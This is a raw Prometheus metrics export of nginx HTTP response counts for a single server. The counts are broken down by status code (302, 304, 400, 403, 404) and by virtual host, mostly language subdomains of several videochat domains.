nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.cafe"} 3554 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.date"} 1018 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.mx"} 998 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.show"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="pt.videochat.world"} 2830 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qdrqgda.videochat.mx"} 309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="qshicka.videochat.mx"} 425 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.cafe"} 753 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.date"} 2032 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.mx"} 3136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.show"} 307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.tv.br"} 626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ro.videochat.world"} 966 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ryfusmrj.videochat.mx"} 427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.cafe"} 728 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.date"} 306 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.mx"} 3396 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.show"} 195 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.tv.br"} 819 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sco.videochat.world"} 851 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sdun.io"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sefi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.cafe"} 787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.date"} 812 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.mx"} 1079 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.show"} 704 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.tv.br"} 871 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="si.videochat.world"} 1046 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sitemap.videochat.mx"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sitemaps.videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.cafe"} 1088 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.date"} 2056 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.mx"} 3091 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.show"} 183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.tv.br"} 642 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sk.videochat.world"} 2353 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.cafe"} 1187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.date"} 2824 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.mx"} 1077 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.show"} 985 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.tv.br"} 872 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sl.videochat.world"} 2475 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sptlqmk.videochat.mx"} 352 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.cafe"} 1349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.date"} 2472 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.mx"} 1016 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.show"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.tv.br"} 1008 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sr.videochat.world"} 1520 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="staging.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="stl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.cafe"} 952 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.date"} 228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.mx"} 764 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.show"} 219 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.tv.br"} 503 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="su.videochat.world"} 580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.cafe"} 2800 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.date"} 2294 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.mx"} 841 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.show"} 334 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.tv.br"} 582 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sv.videochat.world"} 1003 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.cafe"} 701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.date"} 186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.mx"} 1292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.show"} 199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.tv.br"} 569 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="sw.videochat.world"} 646 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.cafe"} 746 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.date"} 368 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.mx"} 1431 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.show"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.tv.br"} 906 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ta.videochat.world"} 849 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.cafe"} 978 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.date"} 617 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.mx"} 1105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.show"} 214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.tv.br"} 498 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="te.videochat.world"} 2169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="test.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.cafe"} 1098 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.date"} 419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.mx"} 1066 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.show"} 385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.tv.br"} 895 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tg.videochat.world"} 3045 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.cafe"} 663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.date"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.mx"} 1040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.show"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.tv.br"} 784 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="th.videochat.world"} 2125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="thingsworko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.cafe"} 690 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.date"} 2372 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.mx"} 1140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.show"} 155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.tv.br"} 931 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tl.videochat.world"} 2598 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.cafe"} 732 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.date"} 454 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.mx"} 1148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.show"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.tv.br"} 840 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.world"} 1110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.cafe"} 1083 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.date"} 581 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.mx"} 1025 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.show"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.tv.br"} 1151 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.world"} 1093 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.cafe"} 527 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.date"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.mx"} 1082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.show"} 177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.tv.br"} 705 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.world"} 514 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.cafe"} 840 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.date"} 2331 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.mx"} 756 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.show"} 544 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.tv.br"} 830 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.world"} 1047 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.cafe"} 1058 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.date"} 706 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.mx"} 1545 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.show"} 257 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.tv.br"} 776 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.world"} 1597 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="user.fangyu.io"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uxoskmy.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.cafe"} 1289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.date"} 683 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.mx"} 1189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.show"} 657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.tv.br"} 1247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.world"} 2064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="v.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.cafe"} 779 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.date"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.mx"} 899 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.show"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.tv.br"} 735 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.world"} 1047 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.cafe"} 14906 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.date"} 14026 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.mx"} 16368 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.show"} 7115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.tv.br"} 29169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.world"} 17750 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="visionsoult.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vmi460104.contaboserver.net"} 790 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="waqqvxh.videochat.mx"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="wjftnkk.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="wngqune.videochat.mx"} 366 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.agmeta.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.cafe"} 610 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.date"} 847 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.mx"} 1389 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.show"} 416 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.world"} 899 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xbodfbs.videochat.mx"} 196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.cafe"} 460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.date"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.mx"} 1189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.show"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.tv.br"} 703 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.world"} 1784 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="y3.y3ccc.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ybifrit.videochat.mx"} 420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.cafe"} 1392 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.date"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.mx"} 1082 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.show"} 210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.tv.br"} 2194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.world"} 1355 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.cafe"} 784 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.date"} 2453 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.mx"} 1074 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.show"} 384 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.tv.br"} 533 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.world"} 1072 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="af.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ba.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ba.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="bg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ca.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="chm.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="chm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="cs.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="cy.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ee.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="es.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="et.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="et.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="eu.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="fa.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="fr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="gl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="hi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ht.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="hu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="is.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="is.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="it.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ka.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ky.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="lo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mi.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ms.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mt.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ne.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="pa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="pt.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="pt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sco.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="su.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="te.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="th.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="th.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="tt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="tt.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="uk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ur.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="uz.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="zh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost=""} 289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="-"} 14009 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="161.97.120.25"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="161.97.120.25:80"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="be.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="cy.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="es.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="eu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="fr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="it.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="ka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="mrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="pa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="pl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="si.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="tg.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="uk.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="it.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="my.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="pt.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="tl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="-"} 1209 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="103.3.60.134"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 529 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="161.097.120.025"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="161.97.120.25"} 7614 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="161.97.120.25:80"} 7363 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="25.120.97.161:80"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="2az1eq5bcj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="32574156-jh888-17.tcr195p888.com"} 1 